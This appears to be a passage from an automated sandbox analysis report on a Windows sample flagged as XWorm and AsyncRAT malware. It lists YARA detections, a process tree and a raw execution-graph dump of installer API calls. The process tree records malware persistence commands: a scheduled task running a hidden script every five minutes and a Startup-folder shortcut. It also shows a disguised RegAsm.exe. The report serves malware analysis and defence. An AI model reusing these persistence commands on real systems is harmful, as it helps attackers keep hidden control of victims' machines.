                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:false

                                                                          Target ID:30
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:choice /d y /t 5
                                                                          Imagebase:0xa60000
                                                                          File size:28'160 bytes
                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:31
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:33
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                          Imagebase:0x360000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:34
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:35
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:36
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                          Imagebase:0x7ff7c6950000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:37
                                                                          Start time:13:08:03
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
                                                                          Imagebase:0x8e0000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:38
                                                                          Start time:13:08:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                          Imagebase:0x7ff7c6950000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:41
                                                                          Start time:13:10:14
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                          Imagebase:0xc70000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:false

                                                                            Execution Graph

                                                                            Execution Coverage:17.8%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:20.7%
                                                                            Total number of Nodes:1526
                                                                            Total number of Limit Nodes:33
4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 
SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 
402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 
4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 
4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 
3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 
3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 
406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 
3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 